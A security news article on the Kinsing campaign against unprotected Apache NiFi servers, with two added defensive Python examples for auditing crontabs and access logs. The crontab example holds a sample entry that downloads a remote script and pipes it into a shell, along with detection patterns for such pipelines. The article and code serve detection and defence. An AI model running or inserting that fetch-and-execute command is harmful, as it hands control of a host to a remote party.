Cybercriminals Targeting Apache NiFi Instances for Cryptocurrency Mining

May 31, 2023 | Ravi Lakshmanan | Server Security / Cryptocurrency


Financially motivated attackers are actively scouring the internet for unprotected Apache NiFi instances to covertly install cryptocurrency miners and facilitate lateral movement.

This finding comes from the SANS Internet Storm Center (ISC), which detected a spike in HTTP requests to “/nifi” on May 19, 2023.

“Persistence is achieved through timed processors or entries in cron,” said Dr. Johannes Ullrich, Director of Research at the SANS Technology Institute. “Attack scripts are not stored on the system. Attack scripts are stored only in memory.”

The honeypot deployment allowed the ISC to determine that the initial foothold was used to drop a shell script that deletes the “/var/log/syslog” file, disables the firewall, and terminates competing crypto-mining tools before downloading and launching the Kinsing malware from remote servers.
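The persistence route named above (cron entries) is something a defender can audit directly. The following is an added example, not code from the article or from SANS ISC: it parses crontab-style text and flags entries whose command fetches a remote script and pipes it straight into a shell, or decodes an embedded payload into one. The sample crontab and its IP address are constructed for the example; the scan covers only the cron side, not NiFi's own timer-driven processors.

```python
import re

# Constructed sample crontab content (not from the article): two benign
# entries and one that fetches a remote script and pipes it into a shell.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/logrotate /etc/logrotate.conf
*/5 * * * * /opt/nifi/bin/nifi.sh status >/dev/null 2>&1
* * * * * curl -fsSL http://203.0.113.10/x.sh | sh
"""

# Patterns a defender would treat as suspicious in a scheduled task:
# fetch-and-execute and decode-and-execute pipelines, and downloads
# staged in world-writable directories.
SUSPICIOUS = [
    (r"\b(curl|wget)\b[^|;]*\|\s*(ba)?sh\b", "download piped into a shell"),
    (r"base64\s+(-d|--decode)[^|;]*\|\s*(ba)?sh\b", "base64 payload piped into a shell"),
    (r"\b(curl|wget)\b.*\b(/dev/shm|/tmp)/", "download written to a world-writable directory"),
]

# Five schedule fields followed by the command; /etc/cron.d files carry an
# extra user field, which simply ends up at the front of the command text.
CRON_LINE = re.compile(r"^\s*(\S+\s+){5}(?P<cmd>.+)$")


def parse_crontab(text):
    """Return the command part of each non-comment, non-empty crontab entry."""
    cmds = []
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        m = CRON_LINE.match(line)
        if m:
            cmds.append(m.group("cmd").strip())
    return cmds


def find_suspicious(text):
    """Return (command, reason) pairs for entries matching a suspicious pattern."""
    hits = []
    for cmd in parse_crontab(text):
        for pattern, reason in SUSPICIOUS:
            if re.search(pattern, cmd):
                hits.append((cmd, reason))
                break  # one reason per entry is enough for triage
    return hits


if __name__ == "__main__":
    for cmd, reason in find_suspicious(SAMPLE_CRONTAB):
        print(f"SUSPICIOUS ({reason}): {cmd}")
```

On a real host the same function can be run over the output of `crontab -l` for each user and over the files under `/etc/cron.d`; a match is a triage lead, not proof of compromise, since legitimate install scripts sometimes use the same idiom.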

It’s worth pointing out that Kinsing has a track record of performing attacks using published vulnerabilities in publicly accessible web applications.

In September 2022, Trend Micro detailed an identical attack chain that leveraged older Oracle WebLogic Server flaws (CVE-2020-14882 and CVE-2020-14883) to distribute cryptocurrency mining malware.


A separate attack launched by the same threat actor against a public NiFi server was designed to harvest SSH keys from infected hosts in order to connect to other systems within the victim’s organization. It also entails executing a second shell script.

A notable indicator of the ongoing campaign is that the actual attack and scanning activity is conducted from IP address 109.207.200[.]43 against ports 8080 and 8443/TCP.
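The indicators above (requests to “/nifi” and the scanning source address) translate directly into a log check. The following is an added example, not code from the article: it parses web-server access logs in Common Log Format, keeps requests whose path begins with `/nifi` (the UI and its REST API share that prefix), and summarises them by source address, counting how many came from the address reported in the campaign. The sample log lines are constructed; the only values taken from the article are the path and the IP address.

```python
import re
from collections import Counter

# Constructed sample access-log lines in Common Log Format (not from the
# article); the probed path and the scanning source mirror the indicators
# reported in the text, the other addresses are documentation ranges.
SAMPLE_LOG = """\
198.51.100.7 - - [19/May/2023:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512
109.207.200.43 - - [19/May/2023:10:02:15 +0000] "GET /nifi HTTP/1.1" 401 0
109.207.200.43 - - [19/May/2023:10:02:16 +0000] "GET /nifi/ HTTP/1.1" 200 8192
203.0.113.5 - - [19/May/2023:10:03:00 +0000] "GET /nifi-api/flow/about HTTP/1.1" 200 230
198.51.100.7 - - [19/May/2023:10:04:41 +0000] "POST /login HTTP/1.1" 302 0
"""

# Indicators from the article: the probed path and the reported scanner.
PROBE_PATH = "/nifi"
KNOWN_SCANNER = "109.207.200.43"

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_log(text):
    """Parse CLF lines into dicts; lines that do not match are skipped."""
    recs = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            d = m.groupdict()
            d["status"] = int(d["status"])
            recs.append(d)
    return recs


def nifi_probes(text):
    """Return the records whose request path starts with /nifi."""
    return [r for r in parse_log(text) if r["path"].startswith(PROBE_PATH)]


def summarize(text):
    """Aggregate the probes by source and count hits from the known scanner."""
    probes = nifi_probes(text)
    by_ip = Counter(r["ip"] for r in probes)
    return {
        "probe_count": len(probes),
        "sources": dict(by_ip),
        "known_scanner_hits": by_ip.get(KNOWN_SCANNER, 0),
        # Probes answered with 200 deserve a closer look: the UI is reachable
        # from that source, which is the exposure the campaign relies on.
        "status_200": sum(1 for r in probes if r["status"] == 200),
    }


if __name__ == "__main__":
    for key, value in summarize(SAMPLE_LOG).items():
        print(f"{key}: {value}")
```

If NiFi is fronted by a reverse proxy, run the check over the proxy's access log; if it is exposed directly, the relevant log is the one NiFi writes for its web listener on ports 8080/8443, whose format may differ from CLF and need its own pattern.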

“Being used as a data processing platform, NiFi servers often access business-critical data,” said SANS ISC. “NiFi servers can be attractive targets because they are configured with large CPUs to support data conversion tasks. Attacks are easy if NiFi servers are not protected.”
